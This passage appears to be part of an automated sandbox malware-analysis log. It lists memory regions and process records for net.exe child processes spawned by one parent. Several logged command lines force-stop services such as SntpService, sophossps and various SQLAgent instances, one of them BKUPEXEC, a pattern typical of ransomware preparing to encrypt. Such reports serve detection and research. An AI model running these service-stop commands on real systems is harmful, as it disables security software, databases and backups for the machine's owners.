start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9938 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9939 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9940 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9941 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9942 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9943 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 9944 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9945 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 9946 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9947 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 748 os_tid = 0xfac Process: id = "267" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5dc5c000" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SntpService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9974 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9975 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9976 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9977 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9978 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9979 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9980 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9981 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9982 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9983 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9984 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9985 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9986 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 9987 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9988 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 750 os_tid = 0xfdc Process: id = "268" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5267b000" os_pid = "0xf24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop sophossps /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9989 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9990 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9991 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9992 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 9993 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9994 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9995 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9996 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9997 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9998 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9999 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10000 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10001 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 10002 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10003 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 752 os_tid = 0xf4c Process: id = "269" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x51c9b000" os_pid = "0xc9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$BKUPEXEC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10004 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10005 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10006 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10007 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10008 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10009 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10010 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10011 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10012 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10013 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10014 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 10015 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10016 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10017 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10018 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 754 os_tid = 0x105c Process: id = "270" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x56dba000" os_pid = "0x10c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10019 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10020 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10021 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10022 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 10023 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10024 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10025 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10026 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10027 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10028 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10029 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 10030 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10031 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 10032 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10033 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 756 os_tid = 0x10fc Process: id = "271" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x531da000" os_pid = "0xfec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$PRACTTICEBGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10034 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10035 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10036 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10037 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 10038 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10039 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10040 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10041 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10042 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10043 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10044 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 10045 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10046 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 10047 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10048 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 758 os_tid = 0x10b0 Process: id = "272" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x641fa000" os_pid = "0xfb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$PRACTTICEMGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10049 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10050 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10051 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10052 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 10053 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10054 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10055 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10056 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10057 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10058 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10059 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 10060 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10061 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 10062 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10063 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 760 os_tid = 0x10c4 Process: id = "273" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5e219000" os_pid = "0x1074" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10064 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10065 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10066 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10067 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10068 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10069 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10070 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10071 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10072 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10073 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10074 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 10075 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10076 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10077 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10078 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 762 os_tid = 0x10b4 Process: id = "274" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5ec39000" os_pid = "0x101c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10079 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10080 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10081 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10082 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10083 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10084 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10085 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10086 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10087 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10088 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10089 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 10090 start_va = 0x7fffffde000 end_va = 